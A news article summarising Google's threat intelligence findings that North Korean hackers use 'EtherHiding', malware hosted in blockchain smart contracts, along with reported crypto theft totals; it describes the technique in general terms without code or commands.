Featured News Headlines
Unstoppable Malware? Inside North Korea’s Use of Blockchain to Spread Cyber Attacks
North Korea’s cybercrime operations are entering a new era, with Google’s Threat Intelligence Group revealing the regime’s adoption of EtherHiding—a novel form of malware that leverages blockchain smart contracts to stealthily distribute malicious code and steal cryptocurrency.
A Nation-State Embraces Blockchain-Based Malware
Previously seen in use by financially motivated cybercriminals since at least September 2023, this marks the first time a nation-state has been confirmed to weaponize EtherHiding, according to Google researchers. The North Korean-linked threat actor UNC5342, associated with the notorious FamousChollima hacking group, has integrated EtherHiding into its Contagious Interview social engineering campaign as of February 2025.
Unlike traditional malware campaigns, EtherHiding is remarkably resistant to takedown efforts. Hosted on public blockchains like BNB Smart Chain and Ethereum, the malicious code is embedded directly into smart contracts, making it virtually impossible to remove. “Traditional campaigns have usually been halted by blocking known domains and IPs,” Google noted, “but smart contracts operate autonomously and cannot be shut down.”
How EtherHiding Works
The attack begins on compromised WordPress websites, where a small JavaScript loader is injected. When a user visits the infected site, the script executes in the browser and uses a read-only function call—such as eth_call—to retrieve the malware payload from the blockchain. Because this method doesn’t involve a blockchain transaction, no gas fees are incurred, and the action remains stealthy and undetected.
Once executed on a victim’s computer, the payload can perform a range of malicious actions: from displaying fake login pages, to installing infostealers, or even deploying ransomware.
A Record-Breaking Year for Crypto Theft
According to blockchain analytics firm Elliptic, North Korean hackers have stolen over $2 billion in 2025 alone, including a staggering $1.46 billion attack on crypto exchange Bybit in February. The DPRK has also been linked to dozens of other attacks targeting platforms like LND.fi, WOO X, and Seedify, bringing its total crypto haul to over $6 billion to date—funds believed to support the country’s nuclear weapons and missile programs.
The regime’s cyber playbook continues to evolve, now including fake companies, social engineering traps, and malicious npm packages. In some cases, North Korean groups are even recruiting non-Koreans to infiltrate tech firms, bypassing increased scrutiny.
The Future of Malware is On-Chain
Google warns that EtherHiding marks a shift in cybercriminal tactics toward “next-generation bulletproof hosting,” utilizing blockchain’s immutability and decentralization for malicious persistence. While tagging smart contracts as malicious offers some visibility, the threat remains active, redefining the cybersecurity challenges facing the crypto ecosystem in 2025.
